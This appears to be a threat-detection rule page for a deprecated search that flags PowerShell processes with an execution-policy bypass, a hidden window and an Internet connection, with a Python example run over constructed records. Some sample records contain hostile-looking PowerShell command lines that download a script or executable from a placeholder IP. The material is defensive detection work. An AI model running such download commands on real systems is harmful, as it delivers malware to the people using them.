Malicious Powershell Process - Connect To Internet With Hidden Window

Description

This search looks for PowerShell processes started with parameters that modify the execution policy of the run, run in a hidden window, and connect to the Internet. This combination of command-line options is suspicious because it overrides the default PowerShell execution policy, attempts to hide its activity from the user, and connects to the Internet. Deprecated because a hidden window is not needed to download a file with System.Net.WebClient, so requiring it makes the search too narrow.


Use Case

Advanced Threat Detection

Category

Endpoint Compromise

Alert Volume


SPL Difficulty

None

Journey

Stage 3

MITRE ATT&CK Tactics

Execution

MITRE ATT&CK Techniques

Command and Scripting Interpreter

PowerShell

MITRE Threat Groups

APT19
APT28
APT29
APT3
APT32
APT33
APT39
APT41
BRONZE BUTLER
Blue Mockingbird
Chimera
Cobalt Group
CopyKittens
DarkHydrus
DarkVishnya
Deep Panda
Dragonfly 2.0
FIN10
FIN6
FIN7
FIN8
Frankenstein
Gallmaker
Gorgon Group
Inception
Kimsuky
Lazarus Group
Leviathan
Magic Hound
Molerats
MuddyWater
OilRig
Patchwork
Poseidon Group
Silence
Soft Cell
Stealth Falcon
TA459
TA505
TEMP.Veles
Threat Group-3390
Thrip
Turla
WIRTE
Wizard Spider
menuPass

Kill Chain Phases

Command and Control
Actions On Objectives

Malicious Powershell Process - Connect To Internet With Hidden Window Help

You must be ingesting data that records process activity from your hosts to populate the Processes node of the Endpoint data model. You must also be ingesting logs that include both the process name and the full command line from your endpoints; the command-line arguments are mapped to the "process" field in the Endpoint data model.
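The following is an added example, not the search's own SPL (which is not reproduced on this page). It implements the three conditions the description names (execution-policy override, hidden window, Internet connection) in Python over a small constructed set of records shaped like the Endpoint.Processes data model, using the field names process_name, process, dest and user (the page itself only names "process"). The command-line spellings matched by the regular expressions, the inclusion of pwsh.exe and of Invoke-WebRequest as an Internet indicator, and the require_hidden switch are assumptions added for illustration; the switch exists to show why the search was deprecated: a System.Net.WebClient download that is not launched with a hidden window is missed when the hidden-window condition is required.

```python
import re
from typing import Dict, List

# Constructed sample records shaped like Endpoint.Processes (only the fields
# this detection needs). These are not real telemetry.
SAMPLE_PROCESSES: List[Dict[str, str]] = [
    {   # all three conditions present: flagged by the rule as described
        "dest": "ws-01", "user": "CORP\\alice", "process_name": "powershell.exe",
        "process": "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden "
                   "-c \"(New-Object System.Net.WebClient).DownloadString('http://203.0.113.5/a.ps1')\"",
    },
    {   # bypass + hidden, but no Internet indicator on the command line
        "dest": "ws-02", "user": "CORP\\bob", "process_name": "powershell.exe",
        "process": "powershell.exe -ep bypass -w hidden -enc SQBFAFgA",
    },
    {   # bypass + WebClient download, but NO hidden window: the deprecation case
        "dest": "ws-03", "user": "CORP\\carol", "process_name": "powershell.exe",
        "process": "powershell.exe -ep bypass "
                   "-c \"(New-Object Net.WebClient).DownloadFile('http://203.0.113.5/b.exe','b.exe')\"",
    },
    {   # ordinary administrative use
        "dest": "ws-04", "user": "CORP\\dave", "process_name": "powershell.exe",
        "process": "powershell.exe -NoProfile -File C:\\scripts\\inventory.ps1",
    },
    {   # cmd.exe record that merely mentions powershell; the child process
        # would be its own Endpoint.Processes record and is judged separately
        "dest": "ws-05", "user": "CORP\\erin", "process_name": "cmd.exe",
        "process": "cmd.exe /c powershell -ep bypass -w hidden",
    },
]

# Assumed spellings for each condition. PowerShell accepts unambiguous
# parameter-name prefixes, so -ep/-ex/-exec and -w/-win/-window are covered.
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}          # assumption
EXEC_POLICY_RE = re.compile(r"-(?:ep|ex|exec|executionpolicy)\s+(?:bypass|unrestricted)", re.I)
HIDDEN_WINDOW_RE = re.compile(r"-(?:w|win|window|windowstyle)\s+hidden", re.I)
INTERNET_RE = re.compile(r"Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest", re.I)


def matches(record: Dict[str, str], require_hidden: bool = True) -> bool:
    """Return True when the record is a PowerShell process whose command line
    overrides the execution policy, (if required) hides its window, and
    contains an Internet-download indicator."""
    if record.get("process_name", "").lower() not in POWERSHELL_IMAGES:
        return False
    cmd = record.get("process", "")
    if not EXEC_POLICY_RE.search(cmd):
        return False
    if require_hidden and not HIDDEN_WINDOW_RE.search(cmd):
        return False
    return INTERNET_RE.search(cmd) is not None


def detect(records: List[Dict[str, str]], require_hidden: bool = True) -> List[str]:
    """Return the dest hosts whose records trip the detection, in input order."""
    return [r["dest"] for r in records if matches(r, require_hidden)]


if __name__ == "__main__":
    print("as described (hidden window required):", detect(SAMPLE_PROCESSES))
    print("hidden window not required:           ", detect(SAMPLE_PROCESSES, require_hidden=False))
```

With the hidden-window condition required, only ws-01 is reported; dropping that condition also surfaces ws-03, the WebClient download launched without -WindowStyle Hidden, which is exactly the gap the deprecation note describes. The process_name check mirrors filtering on the image name in the data model rather than grepping the whole command line, which is why the cmd.exe record on ws-05 is not counted.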
